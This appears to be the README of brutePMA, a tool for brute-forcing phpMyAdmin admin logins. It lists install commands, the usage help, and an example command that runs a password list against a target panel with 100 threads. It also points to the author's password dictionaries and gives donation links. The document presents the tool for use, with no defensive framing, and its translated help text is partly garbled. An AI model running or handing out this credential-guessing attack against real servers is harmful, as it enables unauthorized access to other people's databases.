Bruteforce PhpMyAdmin
Brutforce PhpMyAdmin
apt update && apt upgrade -y
apt install git python3 python3-pip -y
git clone https://github.com/FSystem88/brutePMA
cd brutePMA
python3 -m pip install -r req.txt
usage: main.py [-h] [-t [TARGET]] [-u [USERNAME]] [-p [PASSWORD_LIST]]
[-r [RATE]]
Instructions for using the program
optional arguments:
-h, --help show this help message and exit
-t [TARGET], --target [TARGET]
Link to admin panel phpmyadmin format:
http://site.ru/phpmyadmin
-u [USERNAME], --username [USERNAME]
Database username.
-p [PASSWORD_LIST], --password_list [PASSWORD_LIST]
The path to the file with passwords can be either
sexual or relative. There must be one password on one
line.
-r [RATE], --rate [RATE]
The number of threads with which the program will
start working. The number of streams should not exceed
the number of passwords in your password list.
Example:
python3 main.py -t https://example/phpmyadmin/ -u phpmyadmin -p ../passwords.txt -r 100
Словари для брутфорса можно найти как в интернете, так и у меня на Яндекс Диске.
PSы: hashkiller-dict.7z самый большой, о нём я написал в своём ТГ канале.
cd ~/brutePMA/ && git pull
в любой валюте))
Донатерная!
1. PAYPAL: https://paypal.me/FSystem88
2. QIWI: https://qiwi.com/n/FSYSTEM88
3. YANDEX MONEY: https://money.yandex.ru/to/410015440700904
Free programmers also need to eat :)